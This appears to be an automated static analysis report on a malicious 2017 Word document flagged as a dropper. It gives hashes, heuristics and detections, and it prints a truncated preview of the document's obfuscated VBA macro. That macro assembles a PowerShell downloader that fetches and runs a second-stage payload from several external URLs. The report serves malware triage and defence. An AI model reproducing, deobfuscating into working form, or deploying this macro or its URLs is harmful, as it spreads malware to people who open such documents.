Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c6c682659bbdff6…

MALICIOUS

Office (OLE)

84.5 KB Created: 2017-11-10 22:50:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 6a98f249cfa78467c0010e435434ffff SHA-1: 13b5720b808bbffd45e8d00c1d6199f12b05db92 SHA-256: 5c6c682659bbdff670b715d7e4887c0b652456c0fb31ed680f2ea23017a25413
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains legacy WordBasic and VBA macros, with a critical heuristic firing for a Shell() call within the AutoOpen macro. This indicates the document is designed to execute arbitrary commands upon opening. The reconstructed URL 'http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc/XVc+XVcUamuKMpW0IG' is likely used to download and execute a second-stage payload, consistent with a dropper malware.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6377412-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6377412-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43906 bytes
SHA-256: 3c17e3c089b59699aa9007d00cb81c3862659b0716ade5f21b6fce148837b5f1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 24 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lijuZflAb"
Function YmfoDmwEu()
bjifztRRf = Mid("7JHslJzwV6767OwD+XVc);eUZkarXVc+XVcapXVc+XVcas =XVc+XVc eULSW+LSWXVc+XVcZnsadasdLSW+LSW.nXVc+XVcextXVc+XVpD06", 17, 89) + DrPjVQB + jbqPSKW
bqVwHir = Mid("JcouGX6cilTqcUmlnl09ZXVc+XVcLSW+LSW://pXVc+XVcrzedsXVc+XVczkXVc+XVcoXVc+XVcle25.LSW+LSWedX'+'VcCa7vo0KD9wwkVGMzP", 22, 74) + ulKTUal + rdNUbof
jEjzWwwY = Mid("qans16hY4zRDuf'+'XVc+XVopRpBSA9", 15, 9) + UkcXJjF + Fzpwbuq
zBWnnzls = Mid("OnUDsOMBXVc+XVcovM/,httXVc+XVcp:/XVc+XVc/XVc+XVcbeniXVc+XVct.XVc+XVcbiz/esuBzXVc+'+'XVczmU/,http://remoLSW+LSWnt-XVc+XVcbriXVc+XVctv.XVc+XVcLSW+LSWruXVc+XVc'+'/XVc+XVcUamuKMpW0IG", 8, 167) + LTGcXJd + sDfwhRs
bRFtkbTwzT = Mid("6Y1oPjKGb3ThXl1MSZRXXVcXVc) ((LSW+LSWXVce'+'UXVcLSW+LSW+XVcZfranc = new-'+'XVc+XLSW+LSWVcobXVLSW+LS'+'WcLSW+LSW+XVcjXVc+XVLS'+'W+LSWcect SysXLSW+LSWVc+XVctemXVc+XVc'+'.XVc+XVcNet.XVc+XVcWiijw7W0mBSYQH7T", 21, 167) + cYTOJnW + qzWhvDi
UKHkh = Mid("W0u/XVc+XVcx'+'LXVc+XVcMXVc+XVc.SpXVc+XVc'+'lit(xLXVc+XVcM,XV'+'c+XVcxLMXVctUUJESlC2u5oDY6MXkuHouwVVjX", 3, 73) + OcIrraH + fTIEZZI
wwIwwnDki = Mid("mMhL0XLSW+LSWVc2XVc+XVc45)XVc+XVc;eUXVc'+'+XVcZhuas =XVc+XVc eUZenXVcLSW+LSW+XVcv:XVc+XVcpublXVc+XVcic XVc+XVc+ xLXVc+XVc'+'MXVc+XVc7FTxLLSW+LSWXVc+XVcM XVc+smAisso6HZGnc85hjq", 6, 152) + riwzwlu + YELHRZt
YqPORzCD = Mid("9wIqWO6AzhNRrzjc(1, 343XVc+hO8A4kR", 16, 12) + ICkdjcd + GaaXakU
zzrSrCLWm = Mid("hp5KKJKXVhd6R8uSXOWw1Lace('Ba3',[stRiNG][CHAR]124).rEpLace('LSW',[stRiNG][CHAR]39) ) r9V", 22, 64) + zRWGovJ + WopRUPB
fmmOncoTXH = Mid("I7oXVcZXVc+XVchuasXVc+XVc);brXVc+'+'LSW'+'+LSWXVceXVc+XVcak;}cXVc+XVcatcXVc+XVch{wXVc+XVcritXVc+XVce-XVc+XVchoXVc+XVcst '+'eUZ_.ExcXVc+XVception.JhizqWSGlsNdhG", 4, 142) + XBiOKbJ + ATvZuJQ
TtbFJzUd = Mid("a9cjFHS,hXVc+XVcttXVc+XVcpXVc+XVc:XVc+XVc/XLUoJcsczf8rY9", 8, 37) + KHtLwRn + iGFaBHi
bKMWVAlzU = Mid("YdqwiXVc,XVc+XVc eUXVc+XVc'+'ZLSW+'+'LSWhjow2AFnz", 6, 36) + KjWolJn + fiNwHFP
IUIvicrhd = Mid("F26Wz5K0n6MZXVc+ eUXVc+XVcZkarXVc+XVcapas + xXVc+XVcLXVc+XVcM.XVc+XVc'+'exexLM;foXVc+XLSW'+'+LSWVcreach'+'(eUZXVc+XVcaXVc+XVcbc XVc+XVcin eUZbcd)'+'{XVc+XVctrXVc+XVcy{XVc+XVceXVc+XVcUZUR7vnjHp5pnRj", 13, 172) + FYBpRvW + ENWUuXi
BjWsz = Mid("rThLqb49cebXVc+XVcCliXVc+XVcent'+'LSW+LSWXVc+XVc;XVc+XVceUZnsaXVc+XVcdaXVc+XVcsd = neXVc+XVcw-obje'+'cXVc+XVct randomXVc+XVc;eUZbcd fFGliUa", 9, 124) + VpZbjdo + zRoTKZd
dBLnInzb = Mid("QKZw1RcDzuaXVc+XVcs);XVc+XVcIXVc+XVcnvoke-IteXVc+XVcm'+'XVc+XVc(eUXVc+zo2WiSCfT", 10, 61) + NMWBIsj + vToFKid
MGAkz = Mid("zzCKbiqrLSWnX'+'Vc+XVceXLSW+LSWVc+LSW'+'+LSWXVctXVc+XVc/9sboib", 9, 48) + dHmuhEc + zJRlrNH
zzUZIbhQHb = Mid("lAcjrv6dEQjuQkTzcUEnYNHAR]77),[sTrInG][CH'+'AR]39).REplACE(XVc7FTXVc,[sTLSW+LSWrInG][CHAR]92))LSW)-CREPlAce  LSWXVcLSW,[CHAR]39 -CREPlAceLSW3qSLSW,[CHAR]36) Ba3. ((gV LSW*MdR*LSW).NaMe'+'[3,11,2]-JoiNLS'+'WLSW)').rEp8OIIKtO70LNh0", 23, 194) + wFvYvph + SPAYwtt
tuMTwZz = Mid("h50jjUn5dl9V513J6rWc'+'+XVcc.DoXVc'+'+XVcwnloXVc+XVcaXVc+XVcdLSW+LSWXVc+XVcLSW+LSWFXVc+XVcile(XVc+XVceUZabcXVc+XVc.XVc+XVcToXVc+XVcSXVc+XVctXVc+XVcring()XVc+ohlaa95", 19, 139) + GwtjwNL + pTRRTiq
YYcYHqkzw = Mid("mknSSkumh2zofXVc+XVcranXVLSW+LSPCjo9ZiGFC908NN", 13, 19) + aiGImIE + fPzjRJu
NEzbXvQXu = Mid("FmO9jX2ZzKvpEnomdE9OtYXVZCwzimozan.XVc+XVccom/XVc+XVce/iJHOD4wp", 29, 27) + zTRwusm + LKshFrz
wJrwtK = Mid("RulWYwiruKdv8RUdYfz3SW+LSWVc+XVc/wFE0EhQ35mLPI4XKnNK", 21, 14) + qNcdBQd + PUOCMRl
jXRVtW = Mid("s3Wq3O6WGimqGiiwXVc+XVcwXVc+XVc.cryptXVc+XVcocurre'+'XVc+XVcncycours'+'eXVc+XVc.LSW+W69hFT3", 16, 69) + OiCjoUi + FcqhNFU
AbdEEzo = Mid("Z+XVcu.koninXVc+XVc.pl/dWjXVc+XVcuO/,http:LSW+LSW//mk0zjhvuKrCo8v0", 2, 51) + YKBtlFj + zdcQWWw
vsDVNkHETMX = Mid("fH7TAWfv= XVc+XV'+'cxXVc+XVcLMht'+'tpq703jnYW9iMjQksmZ3VH3s", 9, 29) + PjGrcDf + jUUPzij
uJzFZVr = Mid("hzkv53mQB7kswlsT1FUInVoKe-expRESsioN ( ('((LSW. (
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.